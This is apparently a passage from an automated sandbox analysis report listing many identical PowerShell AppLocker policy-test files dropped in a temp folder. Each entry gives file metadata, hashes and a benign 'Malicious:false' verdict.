                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_invbd4gn.20i.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipcfaiqu.g40.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfabgk3e.n10.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldov2raw.4ch.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfuqxvf4.tps.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdgaukll.m1j.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oinoa51s.3sp.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olvi3pab.iow.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opej2ny5.aws.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmfw2wel.qp3.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pyysbu5m.p0o.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs1c45pt.eyz.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r04v4yc5.lj2.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rplohfhe.3tp.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rsjl4mks.2ms.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt2c2ffb.zob.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxegtlgp.bq0.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sha0sqqt.yiz.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_si0inamr.kis.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szbsmalo.cn2.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0hgim5y.x35.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txx512on.z2j.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usiz1gwq.fex.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
